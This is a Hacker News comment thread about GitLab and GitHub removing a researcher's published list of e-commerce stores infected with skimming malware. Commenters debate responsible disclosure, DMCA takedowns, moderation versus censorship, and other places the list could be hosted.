GL sent me this statement. For the record, I didn't publish vulnerable systems, I published stores that have malware.<p>---<p>Willem,<p>GitLab has opted to remove the list of servers that you posted in your snippet. GitLab views the exposure of the vulnerable systems as egregious and will not abide it.
While GiLab reserves the right take further action, up to and including termination (<a href="https://about.gitlab.com/terms/" rel="nofollow">https://about.gitlab.com/terms/</a>), we have chosen not to terminate or lock your account.<p>Please know this decision was not reached lightly and we appreciate your understanding on the matter.<p>Regards,
GitLab<p>GitLab Support Team
GitLab, Inc.
We at GitLab believe the author did not responsibly disclose this security information in a proper manner, and today we removed the list of hosts in accordance with our terms of service (<a href="https://about.gitlab.com/terms/" rel="nofollow">https://about.gitlab.com/terms/</a>).<p>The author says that he contacted "about 30 merchants directly", but the published list includes over 1000 merchants. Most merchants were neither informed nor given a chance to respond in a timely manner. We did not feel comfortable hosting information that could be construed as an open invitation for malicious users to exploit.
Archive of the list on Gitlab which is now 404:<p><a href="https://web.archive.org/web/20161014133252/https://gitlab.com/gwillem/public-snippets/snippets/28813" rel="nofollow">https://web.archive.org/web/20161014133252/https://gitlab.co...</a>
Do this kind of thing on your own domain.<p>I have a list of major sites with currently active phishing pages.[1] This is basically a join of PhishTank and DMOZ. Nobody seems to be upset by that.<p>Google is at the top of the list because of their hosting business. It's not just Google Sites. You can put a web site in a Google Spreadsheet cell, which Google doesn't seem to check as a possible phishing site.<p>If you host for others, or offer a URL shortening service, you need automated checking against all available phishing lists or you will be exploited.<p>[1] <a href="http://sitetruth.com/reports/phishes.html" rel="nofollow">http://sitetruth.com/reports/phishes.html</a>
> I understand that Github doesn’t have the resources to investigate each and every DMCA notice.<p>The DMCA as written really encourages no investigation whatsoever on the part of the service provider, this is pretty much how everyone acts. File a counter-notice with the service provider if you don't think your content violates anyone's copyright.<p>In this case, if Github took it down because of a DMCA notice, i think Github actually behaved _better_ than Gitlab. Github is simply following DMCA, if you file a counter-notice, they'll probably restore it -- if they don't, and say it's not an issue of copyright, it's just that they don't want to host your material, then at that point they'll be behaving similarly to Gitlab. Gitlab did not take it down because of a DMCA notice, they took it down because they decided it was 'egregious' and they just didn't want to host it.<p><a href="https://help.github.com/articles/guide-to-submitting-a-dmca-counter-notice/" rel="nofollow">https://help.github.com/articles/guide-to-submitting-a-dmca-...</a><p>I can't find any gitlab docs on filing a DMCA counter notice. Their DMCA policy at <a href="https://about.gitlab.com/dmca/" rel="nofollow">https://about.gitlab.com/dmca/</a> is short and solely targetted at those claiming infringement, there is no description of how to file a counter-notice.<p>In this case, I think github wins. The terrible parts of github's counter-notice policy (10-14 days until your content comes back) is part of the DMCA law. Take it up with your congresspeople. <a href="http://io9.gizmodo.com/the-dmca-how-it-works-and-how-its-abused-1616830093" rel="nofollow">http://io9.gizmodo.com/the-dmca-how-it-works-and-how-its-abu...</a><p>However, reading OP again -- it's not clear to me that Github took it down because of DMCA. They may simply be acting exactly like Gitlab, taking it down because they don't want to host it, unrelated to DMCA. But I wanted to clear up some things about the DMCA, since OP mentioned it.
How exactly does publishing a list of malware-infected stores fall under the DMCA? I always thought DMCA was meant to be for copyright infringement cases.<p>I didn't see the list, but did it by any chance contain the logos of the online stores? If it did, the DMCA notices make sense.
Gitlab CEO just called me and apologized, will restore data shortly.<p>I am personally very sorry that GL got in a bad light here. They had misinterpreted my data and have acknowledged that. For comparison, I have heard nothing from GH over the last two days.<p>Gitlab, you rock.
GitLab and GitHub are both pretty active on HN. I look forward to their response - where is it already?!<p>I'm especially disappointed by GL. GH is already too big to care about such things.
There is a service <a href="http://www.cryptograffiti.info/" rel="nofollow">http://www.cryptograffiti.info/</a> which can be used for posting sensitive information that should not be removed or hidden. It allows to write a message and store it in Bitcoin blockchain as a transaction. It costs near 0.0015 BTC or $1 per kB. Large files can be posted as magnet links to torrents with them.<p>Even if the service's site had been shut down, everyone would always be able to obtain the transaction from it's hash using any bitcoin client/blockchain explorer, convert it to ASCII and read the text.<p>I'd like to note that it is worth to sign with GPG all messages posted that way in order to have ability to post updates and verify authorship.
After briefly looking at <a href="https://github.com/github/dmca/tree/master/2016" rel="nofollow">https://github.com/github/dmca/tree/master/2016</a> there doesn't appear to be any DMCA request for gwillem's content, so maybe it wasn't removed through the DMCA process?
Definitely feels like a bad interpretation on Gitlab's part, but not done out of malice.<p>The person was not exposing sites that nobody previously knew about -- the sites were already compromised, there is nothing to compromise again except maybe having more than one attacker in your compromised account. The damage is already done, though.<p>These are likely web applications that were not kept up to date so the responsible security disclosure already happened when it was reported for WordPress/Drupal/Joomla. It is the site owners responsibility to pay attention to those security disclosures, which they likely failed to do.<p>And those compromised sites, in my experience, are usually attacking and infecting other sites and servers on the Internet. That makes them a public nuisance and so public disclosure is necessary so they can be appropriately blocked/isolated.
Discussion of origin of the list here<p><a href="https://news.ycombinator.com/item?id=12707860" rel="nofollow">https://news.ycombinator.com/item?id=12707860</a>
Article doesn't say that gitlab censored the list, though the gitlab link is a 404.<p>Also, are they actually using DMCA to get these lists taken down? If so, isn't there some penalty for filing a false DMCA?
Perhaps distributing this list is a use case for IPFS?<p><a href="https://ipfs.io/docs/getting-started/" rel="nofollow">https://ipfs.io/docs/getting-started/</a>
> I understand that Github doesn’t have the resources to investigate each and every DMCA notice. However, it still took me by surprise that Github censors data so easily.<p>Send a counter-notification asserting that the data is not under copyright and have it put back up. Assuming this is really DMCA.
So it seems the real bug here is that a site that is hosting malware is doing so because its actually vulnerable to being hacked, was hacked, and malware was installed. So posting the site name identifies a vulnerable site (which is wrong) and stops informing people that those sites have malware on them (which is an issue as well).<p>That is quite the catch 22. And of course many of the sites owners are clueless and don't even know how to patch or fix their systems.<p>My isn't that that a mess?
Isn't it the whole point of GitLab that it's decentralized? As in, you can roll your own instance and stop worrying about censorship?<p>I'm pretty sure someone here has a GitLab instance that is willing to share for this purpose.
Back to the original problem of skimming.<p>I think the fastest way to get sites fixed is to run a script that crawls sites in the list, parses their Twitter and posts a warning there with link to original article.<p>Can someone help with that?
And just like that, we discover how helpless the average Joe is against corporate money.<p>Let's crowdfund an AWS s3+CloudFront hosted site. DDosing that is no easy feat, and if corps do try it, the logs can prove their complicity, which has legal implications I presume
As soon as I read this I assumed it was as a libel prevention method.<p>I'd be curious whether Gitlab/hub could be held responsible for proving the accuracy of the claims? (That was my initial assumption as to the reason they were taken down.)
Why is a third-party required to publish the list, couldn't it be hosted on the blog post itself? That would have the advantage of being to archive the whole thing on a single page.
To be fair, maybe some automated method that hub/lab owners have not vetted the data overall. I hope your list stays up/public personally as long as you are willing to take responsibility for its upkeep. I wish there was some format to submit this list (and your responsibility for keeping up with it) to vendors on the lookout for this kinda stuff (up to them to decide inclusion).
I don't know enough about these kinds of situations yet to form a reasonable argument for-or-against. Is what was done considered a kind, favourable thing for the developers behind those sites or is it something that shouldn't have been displayed?
"Moderated", not "censored". Neither GitHub nor GitLab have stopped the message going out from outlets other than their own. Would we be comfortable calling the moderators here on HN "censors"?
I tried to pay in several of these shops. Most didn't even had the functionality to pay with card. The only one in my sample where I was able to get to the payment form had redirected me to the proper payment gateway.
<a href="http://gogsys33repvmfz5.onion/" rel="nofollow">http://gogsys33repvmfz5.onion/</a> Free gog git server in Tor.<p>Also, it will ask for an email on registration, but it isn't verified and no email is sent.
I wonder how google acts, if you dump the list here:<p><a href="https://www.google.com/safebrowsing/report_badware/" rel="nofollow">https://www.google.com/safebrowsing/report_badware/</a>
Now I see. I thought this was a list of stores hacked through the current vulnerability. This is a list of stores hacked through 1-2y old vulnerabilities.
I'm kind of with Gitlab on this one, just publishing a list of broken sites isn't going to help them get fixed. Most of the owners probably barely know the Googles from the Facebooks, so even if you email them saying 'you have this JavaScript thing that's bad' they won't understand and will blow you off.<p>OP doesn't go into details of how they check the stores, but I'd assume they have some sort of script as they checked 255k. If that's the case it would be trivial to send an automated email if malware is detected, and include links explaining how to fix it.<p>It won't resolve everything but it's a lot nicer than naming&shaming businesses who have effectively done nothing wrong. What I mean is they probably hired a developer or team to build their website, and assumed that they would build a secure website - they didn't go out purposely and find someone to build them a site that would be hacked.
The malisious code on those websites isn't your bussiness guys. If their owners wish not to respond and not fix it -- they have a right to do so. Why are you all so anxious? It has nothing to do with you all. Just don't buy from them, that is simple.<p>Needless to say, I've seen most of those websites for the 1st time.<p>The world is unfair? No, it's fair and this proves that it is fair.